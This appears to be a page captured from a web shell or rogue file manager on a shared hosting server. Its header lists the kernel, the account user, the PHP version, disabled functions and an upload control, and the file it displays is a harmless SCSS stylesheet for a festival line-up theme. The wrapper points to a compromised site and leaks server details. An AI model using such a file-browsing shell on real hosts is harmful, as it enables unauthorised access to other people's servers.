HEX
Server: Apache
System: Linux webm013.cluster123.gra.hosting.ovh.net 6.18.42-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Wed Aug 5 15:59:48 CEST 2026 x86_64
User: lesanew (165608)
PHP: 8.3.31
Disabled: _dyuweyrj4,_dyuweyrj4r,dl
Upload Files
File: /home/lesanew/anestetues2/web/app/themes/anes-tetues/resources/css/components/_line-up.scss
@use '../utilities';

.line-up-header {
  margin-bottom: utilities.space(4);
}

.line-up__artistes {
  .line-up__artiste {
    margin-bottom: utilities.space(4);
    display: flex;
    flex-direction: column;
    align-items: center;

    img {
      order: -1;
      margin-bottom: utilities.space(2);
      width: 100%;
    }

    h3 {
      font-size: 1.8rem;
      margin-bottom: utilities.space(1);
      text-align: center;
    }
  }
}

@media screen and (width >= 768px) {
  .line-up-header {
    margin-bottom: 0;
  }

  .line-up__artistes {
    display: flex;
    flex-wrap: wrap;
    justify-content: center;

    .line-up__artiste {
      width: calc(50% - 2rem);

      &:nth-child(even) {
        margin-left: 4rem;
      }
    }
  }
}

@media screen and (width >= 1280px) {
  .line-up__artistes {
    gap: utilities.space(8) 0;

    .line-up__artiste {
      margin-bottom: 0;
      width: calc((100% / 3) - 2rem);

      &:nth-child(even) {
        margin-left: unset;
      }

      &:not(:nth-child(3n + 1)) {
        margin-left: 3rem;
      }

      h3 {
        font-size: 3.2rem;
        white-space: nowrap;
      }

      .line-up__artiste-dates {
        font-size: 2.2rem;
      }
    }
  }
}